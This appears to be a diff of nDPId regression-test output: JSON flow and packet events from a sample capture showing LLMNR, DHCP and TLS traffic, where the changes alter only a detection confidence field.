00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1470104408458,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104408458,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KyIAAAER6Y3AqANf4AAA\/Mj7FOsAJrP2U3QAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} 00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1470104408662,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104408662,"pkt":"\/\/\/\/\/\/\/\/wKC7c+tHCABFAAFZOwBAAEARwM3AqH0e\/\/\/\/\/\/YA9gABRUfM\/\/+TXaAAwKC7c+tHwKh9HgAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+tHQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDI1AAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqH0e\/\/8AAFBvcnQgMTAAIAGwMAIUAQDCoLv\/\/nPrR0A="} 00915{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1470104408662,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":391,"pkt_l4_len":337,"thread_ts_msec":1470104408662,"pkt":"MzMAAAABwKC7c+tHht1gAAAAAVERgCABsDACFAEAwqC7\/\/5z60f\/AgAAAAAAAAAAAAAAAAAB9gD2AAFRTer\/D5NdoADAoLtz60cgAbAwAhQBAMKgu\/\/+c+tHAAACACcBREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFN3aXRjaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4xMC4wMTMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAoLtz60dCMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFQMFIxRDkwMDAwMjUAAAAAAAAAAAAAAAAAAAAAAAAAREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCofR7\/\/wAAUG9ydCAxMAAgAbAwAhQBAMKgu\/\/+c+tHQA=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1470104409586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104409586,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD0rIU6wAgVxmmDQAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1470104409586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104409586,"pkt":"AQBeAAD8PKn0WgOECABFAAA0H6gAAAER9IDAqAPs4AAA\/NrrFOsAIGYJpg0AAAABAAAAAAAABmlzYXRhcAAAAQAB"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104409685,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD0rIU6wAgVxmmDQAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104409685,"pkt":"AQBeAAD8PKn0WgOECABFAAA0H6kAAAER9H\/AqAPs4AAA\/NrrFOsAIGYJpg0AAAABAAAAAAAABmlzYXRhcAAAAQAB"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104410885,"flow_last_seen":1470104410885,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1470104410885,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -425,36 +425,36 @@ 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1470104410914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104410914,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsew8LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgKoAAYABAAXABg="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1470104411327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104411327,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7YAAAERvzfAqAUl4AAA\/NTqFOsAIqEiFTIAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1470104411735,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104411735,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7cAAAERvzbAqAUl4AAA\/NTqFOsAIqEiFTIAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1470104412556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"thread_ts_msec":1470104412556,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD\/DgU6wAp0RQMEAAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1470104412556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104412556,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9eeQAAAERmPbAqAUx4AAA\/Pw4FOsAKTqNDBAAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1070,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1470104412962,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"thread_ts_msec":1470104412962,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD\/DgU6wAp0RQMEAAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1470104412962,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104412962,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9eeYAAAERmPTAqAUx4AAA\/Pw4FOsAKTqNDBAAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1470104413679,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104413679,"pkt":"\/\/\/\/\/\/\/\/SNIkYwreCABFAAFIfjcAAEARNZ3AqAUp\/\/\/\/\/wBEAEMBNOoXAQEGAAJEmkEAAIAAwKgFKQAAAAAAAAAAAAAAAEjSJGMK3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEIPQcBSNIkYwreDAhrZXZpbi1QQzwITVNGVCA1LjA3DQEPAwYsLi8fIXn5K\/z\/AAAAAAAAAAAAAAAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"kevin-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"kevin-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}} 00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1470104413815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104413815,"pkt":"TF4M6gNlYMVHBbyMCABFAAFIqYMAAEAR0r\/AqAUQwKh3AQBEAEMBNFvwAQEGABeXwM0AAAAAwKgFEAAAAAAAAAAAAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwkBAwYPd1\/8LC45AgXcPQcBYMVHBbyMMwQAdqcADAtNYWNCb29rLUFpcv8AAAAAAAAAAAAAAAAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1159,"pkt_l4_len":1125,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAAR5Xv9AAEAGm5bAqAUQHw1XJNFMAbv8UmzuBJ2iMIAYEABHkgAAAQEIChoPmUJf7iUmFwMDBEAsTuFq8CapSbqPXvcdxKrSs42tBtoxpkpEhbC8nI\/Z9Ti9iLIQZa5j5LW58IaLnxvFb3pZI+B1RxFJh1MX7hfwSESpGA\/xdeEaXYqNDQOsIrAzCG5XHIwlKsfFfn\/8RQrusMspya+fP6t\/Zg2Y6qSh9wcmn8mXJja+baLib9aevB6ce5XBs3a64vsRCgFs5NXASh55KEqD8yMaqdrRhlWFE6xGr6+SpmMLlVUwh48nOg1sBDe\/WYgSpLNk63+28tyTAwCIcOk3y10vOsyt7ZjgvztDnWOLtsn7\/6kMi3u2RdUB7eGGzM2NovPfgy\/qKgW2LAn44liW9WewObR4bp+dPFEvC0Y3+SW5bib2uvhBosFVLRK5YrZcwALZJXqqXhrrs6bu\/ljawzwGUMfLGQ2WSbwafdg9dJ73rdMEF1vEvfkETGUyJeWyPgg2G2DdxVtAlhAOni2Cb6JW3jV3kUvfm9gPSADxqT1QqjMQAvLuAsUt5WChMz4yp18RafOK\/1ZUrwxEzqELsHqkpHQf4ILnKSgg5+kGWAcGpm5BV27qLCy+WyMYEnVR9nevFTvw2OV3haLNTqpyfd4K7vOAMw+dbscVa9MHAeqcd7IQnXV8FbWdFXkC4wCM4E8hTvbfJf2QumZQ2fXLtiYd3sw8qoFpqMjmllDchFzska7DS7GVif4h6CnDNlZ4V+i1Eng9ELpwqlbXjyiEgMAhv7fPmI8e61K\/2gGY8OMdxcNsyD40PLGc9n2gJgcjUdhv3yk5lS0wyxma1JJ1Pa0sEMzvHL8CT6BpEzwkMJEMkciKtJ6VsJyummJhpN5MU9bS0CfSvwU0ARZvT+jD4m9Xd2enHnLuDwg4KR5SAhfN1vXfVfNlzPARDhSaBSDDpj8POKqEg5amwWHcBAQbXCOcOftYxPyyUfYlmBS91ssyfM9KHAYAPjuptOjnLxGz2x9TbNHcI4nTKruVWTV9ktQaEfrdpb\/HDqnCQBNGReenZ\/zWZ\/GfJml4Cm+qteZq9C64lEHb9+XokUZOr8X2s3gyZpMYfRa5jmhmO9xmHg7WJrK4eIDuKfpKwBJ058yTVyD7l0KDSW9GneGAGkjet6prc4idVI6G79csJZdQxaibq52QgAy0phRLTPkicoq0gLlZcIZm+Mml46cJhhEv0H26dA+KCoM5R5DwKEyBjuFs1QF3Y4+SDB+bc1Wt792AR8qtKWp6gbS96vJnCeIhTEA3KFLfapTzgvIE4vSB7KreGQj+tnmHbTp1DHeV+7y4PmFv5on7p4A6CEwD6f6fjePEHDfs